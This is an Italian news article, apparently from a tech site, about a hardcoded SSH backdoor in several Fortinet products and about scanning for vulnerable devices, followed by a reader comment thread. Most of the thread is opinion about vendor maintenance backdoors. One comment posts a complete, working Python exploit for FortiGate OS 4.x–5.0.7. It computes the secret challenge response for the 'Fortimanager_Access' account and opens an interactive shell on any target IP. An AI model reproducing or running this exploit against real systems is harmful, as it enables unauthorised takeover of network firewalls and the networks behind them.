Alfonso Maruccia

Fortinet, la backdoor si spalanca

L'azienda allarga l'indagine interna e identifica nuovi prodotti vulnerabili, mentre dall'esterno ignoti indirizzi IP cinesi si sono già attivati per scovare gli apparati di rete attaccabili

Roma - Dopo il primo caso emerso un paio di settimane fa, la backdoor di Fortinet aumenta di dimensioni e ingloba nuovi apparati: l'origine del problema continua a essere una conseguenza "non intenzionale" di una funzionalità legittima, spiega la società, ma agli attaccanti la cosa interessa poco quando si tratta di individuare le "scatole" di Internet vulnerabili che è possibile attaccare dall'esterno.

La backdoor originale è stata individuata in versioni specifiche di FortiOS e permette di aprire una sessione SSH da remoto tramite una stringa codificata nel firmware, e ulteriori indagini condotte internamente hanno identificato la stessa vulnerabilità anche nelle ROM dei prodotti FortiAnalyzer, FortiSwitch e FortiCache.

Nel rilasciare aggiornamenti software specifici, Fortinet definisce la stringa codificata come una funzionalità progettata per garantire accesso facile e veloce agli apparati da parte del personale di supporto della società. In ogni caso, spiega, non si tratta in alcun modo di una "backdoor malevola" implementata per permettere l'accesso a utenti non autorizzati.
Quale che sia la giustificazione adottata da Fortinet, la backdoor esiste ed è già entrata nel mirino dei professionisti dell'hacking e (peggio ancora) del cyber-crimine: secondo le analisi del SANS Internet Storm Center e degli input da parte dei professionisti dell'infosec, da due IP cinesi (124.160.116.194 e 183.131.19.18) sono già partite le scansioni su Internet alla caccia degli apparati Fortinet vulnerabili.

Alfonso Maruccia
Notizie collegate
  • SicurezzaFortinet, sospetto di backdoorRicercatori identificano una nuova funzionalità nascosta all'interno di una ben nota marca di appliance telematiche, anche se il produttore si rifiuta di classificare il problema come "backdoor" e rassicura: falla chiusa da tempo
  • SicurezzaAMX, i superpoteri delle backdoorI ricercatori identificano un account "segreto" all'interno degli apparati di comunicazione utilizzati dai vertici delle autorità statunitensi. Il produttore chiude la falla ma ne apre un'altra identica
  • SicurezzaCassandra Crossing/ Il crittografo e il Grande Fratellodi M. Calamari - David Chaum è padre di invenzioni rivoluzionarie nell'ambito della crittografia: teorizza la moneta digitale e il principio delle mix-net. Ma certe proposte recenti prestano il fianco al tecnocontrollo
  • TecnologiaCassandra Crossing/ Backdoor: un gioco in cui tutti perdonodi M. Calamari - Una backdoor è una backdoor per i buoni e per i cattivi. Imporre alle aziende di lasciare aperto uno spiraglio nel proprio codice potrebbe spalancare le porte ad un olocausto informatico
29 Commenti alla Notizia Fortinet, la backdoor si spalanca
Ordina
  • Ho scaricato un virus che ha brasato il vecchio firmware...
    www.openwrt.org
    A bocca apertaCon la lingua fuori
    non+autenticato
  • "la stringa codificata come una funzionalità progettata per garantire accesso facile e veloce agli apparati da parte del personale di supporto della società"

    quindi una backdoor!

    "In ogni caso, spiega, non si tratta in alcun modo di una backdoor malevola"

    Ah però loro dicono che sono buoni.
    Allora tutto a posto: io mi fido. A bocca aperta
    non+autenticato
  • - Scritto da: omino della backdoor
    > "la stringa codificata come una funzionalità
    > progettata per garantire accesso facile e veloce
    > agli apparati da parte del personale di supporto
    > della
    > società
    "
    >
    > quindi una backdoor!
    >
    > "In ogni caso, spiega, non si tratta in alcun
    > modo di una backdoor
    > malevola
    "
    >
    > Ah però loro dicono che sono buoni.
    > Allora tutto a posto: io mi fido. A bocca aperta

    anche stalin quando ha fatto fuori 4 milioni di ucraini lo faceva per far star piu larghi quelli che fossero sopravvissuti: in pratica un benefattore dell'umanita'.
    non+autenticato
  • - Scritto da: omino della backdoor
    > "la stringa codificata come una funzionalità
    > progettata per garantire accesso facile e veloce
    > agli apparati da parte del personale di supporto
    > della
    > società
    "
    >
    > quindi una backdoor!
    >
    > "In ogni caso, spiega, non si tratta in alcun
    > modo di una backdoor
    > malevola
    "
    >
    > Ah però loro dicono che sono buoni.
    > Allora tutto a posto: io mi fido. A bocca aperta

    Anch'io!
    non+autenticato
  • "Fortinet definisce la stringa codificata come una funzionalità progettata per garantire accesso facile e veloce agli apparati da parte del personale di supporto della società."

    Poter avere accesso senza chiedere il consenso al cliente, visto che i tecnici e compagnia bella erano a conoscenza di questa porta spalancata, mi sa che potevano fare un pò come gli pare con i loro apparati.
  • - Scritto da: SalvatoreGX
    > "Fortinet definisce la stringa codificata come
    > una funzionalità progettata per garantire accesso
    > facile e veloce agli apparati da parte del
    > personale di supporto della
    > società."
    >
    > Poter avere accesso senza chiedere il consenso al
    > cliente, visto che i tecnici e compagnia bella
    > erano a conoscenza di questa porta spalancata, mi
    > sa che potevano fare un pò come gli pare con i
    > loro
    > apparati.


    Ed aggiungo.... Non proprio in questo modo, ma tutti gli apparati telecontrollati, tipo modem alice (telecom) , visto che hanno delle porte in ascolto per gli aggiornamenti firmware, potrebbero nascondere un qualcosa del genere.
  • - Scritto da: SalvatoreGX
    > - Scritto da: SalvatoreGX
    > > "Fortinet definisce la stringa codificata
    > > come una funzionalità progettata per
    > > garantire accesso facile e veloce agli
    > > apparati da parte del personale di
    > > supporto della società."

    > > Poter avere accesso senza chiedere il
    > > consenso al cliente, visto che i tecnici
    > > e compagnia bella erano a conoscenza di
    > > questa porta spalancata, mi sa che
    > > potevano fare un pò come gli pare con i
    > > loro apparati.
    >
    > Ed aggiungo.... Non proprio in questo modo, ma
    > tutti gli apparati telecontrollati, tipo modem
    > alice (telecom) , visto che hanno delle porte in
    > ascolto per gli aggiornamenti firmware,
    > potrebbero nascondere un qualcosa del
    > genere.

    Quelli Fastweb, in generale quando il provider vuole fornirvi il modem è quasi sempre provvisto di backdoor "per manutenzione".
    non+autenticato
  • - Scritto da: nome e cognome
    > - Scritto da: SalvatoreGX
    > > - Scritto da: SalvatoreGX
    > > > "Fortinet definisce la stringa
    > codificata
    > > > come una funzionalità progettata per
    > > > garantire accesso facile e veloce agli
    > > > apparati da parte del personale di
    > > > supporto della società."
    >
    > > > Poter avere accesso senza chiedere il
    > > > consenso al cliente, visto che i tecnici
    > > > e compagnia bella erano a conoscenza di
    > > > questa porta spalancata, mi sa che
    > > > potevano fare un pò come gli pare con i
    > > > loro apparati.
    > >
    > > Ed aggiungo.... Non proprio in questo modo,
    > ma
    > > tutti gli apparati telecontrollati, tipo
    > modem
    > > alice (telecom) , visto che hanno delle
    > porte
    > in
    > > ascolto per gli aggiornamenti firmware,
    > > potrebbero nascondere un qualcosa del
    > > genere.
    >
    > Quelli Fastweb, in generale quando il provider
    > vuole fornirvi il modem è quasi sempre provvisto
    > di backdoor "per
    > manutenzione".

    Che poi se non erro, sei quasi obbligato a prendere quello fastweb.
  • - Scritto da: SalvatoreGX

    > > Quelli Fastweb, in generale quando
    > > il provider vuole fornirvi il modem è
    > > quasi sempre provvisto di backdoor "per
    > > manutenzione".

    > Che poi se non erro, sei quasi obbligato
    > a prendere quello fastweb.

    Che per me è già un motivo per non prendere fastweb: pensa te se per aprire le porte di casa mia devo accedere alla MyFastwebPage !
    non+autenticato
  • - Scritto da: SalvatoreGX
    > - Scritto da: SalvatoreGX
    > > "Fortinet definisce la stringa codificata come
    > > una funzionalità progettata per garantire
    > accesso
    > > facile e veloce agli apparati da parte del
    > > personale di supporto della
    > > società."
    > >
    > > Poter avere accesso senza chiedere il consenso
    > al
    > > cliente, visto che i tecnici e compagnia bella
    > > erano a conoscenza di questa porta spalancata,
    > mi
    > > sa che potevano fare un pò come gli pare con i
    > > loro
    > > apparati.
    >
    >
    > Ed aggiungo.... Non proprio in questo modo, ma
    > tutti gli apparati telecontrollati, tipo modem
    > alice (telecom) , visto che hanno delle porte in
    > ascolto per gli aggiornamenti firmware,
    > potrebbero nascondere nascondono un qualcosa del
    > genere.

    fixed
    non+autenticato
  • #!/usr/bin/env python

    # SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
    # Usage: ./fgt_ssh_backdoor.py <target-ip>

    import socket
    import select
    import sys
    import paramiko
    from paramiko.py3compat import u
    import base64
    import hashlib
    import termios
    import tty

    def custom_handler(title, instructions, prompt_list):
        n = prompt_list[0][0]
        m = hashlib.sha1()
        m.update('\x00' * 12)
        m.update(n + 'FGTAbc11*xy+Qqz27')
        m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\
    x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1
    \x32\x90\x29\xA9\x81\x5B\x70')
        h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
        return [h]


    def main():
        if len(sys.argv) < 2:
            print 'Usage: ' + sys.argv[0] + ' <target-ip>'
            exit(-1)

        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        try:
            client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False)
        except paramiko.ssh_exception.SSHException:
            pass

        trans = client.get_transport()
        try:
            trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
        except paramiko.ssh_exception.AuthenticationException:
            pass

        trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)
        chan = client.invoke_shell()

        oldtty = termios.tcgetattr(sys.stdin)
        try:
            tty.setraw(sys.stdin.fileno())
            tty.setcbreak(sys.stdin.fileno())
            chan.settimeout(0.0)

            while True:
                r, w, e = select.select([chan, sys.stdin], [], [])
                if chan in r:
                    try:
                        x = u(chan.recv(1024))
                        if len(x) == 0:
                            sys.stdout.write('\r\n*** EOF\r\n')
                            break
                        sys.stdout.write(x)
                        sys.stdout.flush()
                    except socket.timeout:
                        pass
                if sys.stdin in r:
                    x = sys.stdin.read(1)
                    if len(x) == 0:
                        break
                    chan.send(x)

        finally:
            termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)


    if __name__ == '__main__':
        main()
  • Esattamente per la ragione che tu esponi ho cambiato e invito chiunque conosca a cambiare i router telecom. Quando l'ho scoperto stavo per insultarli. Un accesso remoto noto a pig+dogs! Robe da matti!
    non+autenticato
  • - Scritto da: Luca
    > Esattamente per la ragione che tu esponi ho
    > cambiato e invito chiunque conosca a cambiare i
    > router telecom. Quando l'ho scoperto stavo per
    > insultarli. Un accesso remoto noto a pig+dogs!
    > Robe da
    > matti!

    Vorrei poter capire meglio quanto detto da te.

    Potresti postare qualcosa di più concreto? Grazie in anticipo.
    non+autenticato
  • - Scritto da: Ugo Amendolare
    > - Scritto da: Luca
    > > Esattamente per la ragione che tu esponi ho
    > > cambiato e invito chiunque conosca a cambiare i
    > > router telecom. Quando l'ho scoperto stavo per
    > > insultarli. Un accesso remoto noto a pig+dogs!
    > > Robe da matti!
    >
    > Vorrei poter capire meglio quanto detto da te.
    >
    > Potresti postare qualcosa di più concreto? Grazie
    > in anticipo.

    Immagina che io ti venda un modem, ed un giorno ti accorgi che dentro a questo modem io mi sono tenuto una corsia preferenziale attraverso la quale posso vedere tutto quello che fai in rete, cambiarti le cnfigurazioni, gestire la tua linea internet.
    non+autenticato
  • - Scritto da: Passante
    > - Scritto da: Ugo Amendolare
    > > - Scritto da: Luca
    > > > Esattamente per la ragione che tu
    > esponi
    > ho
    > > > cambiato e invito chiunque conosca a
    > cambiare
    > i
    > > > router telecom. Quando l'ho scoperto
    > stavo
    > per
    > > > insultarli. Un accesso remoto noto a
    > pig+dogs!
    > > > Robe da matti!
    > >
    > > Vorrei poter capire meglio quanto detto da
    > te.
    > >
    > > Potresti postare qualcosa di più concreto?
    > Grazie
    > > in anticipo.
    >
    > Immagina che io ti venda un modem, ed un giorno
    > ti accorgi che dentro a questo modem io mi sono
    > tenuto una corsia preferenziale attraverso la
    > quale posso vedere tutto quello che fai in rete,
    > cambiarti le cnfigurazioni, gestire la tua linea
    > internet.
    nei buoni vecchi router adsl alice (tipo gli 'AGA' e/o gli 'AGPF' non ricordo) ce n'erano addirittura tre
    - una e' istutuzionale e trasversale ma 'non per tutti' (il TR069)
    - una era dall'algo predicibile per generare le pw WPA
    - un'altra era un bel daemon in ascolto (in lan) che ad un specifico pacchetto rispondeva con l'abilitazione del telnet e di admin/admin (o qualcosa di molto simile)
    non+autenticato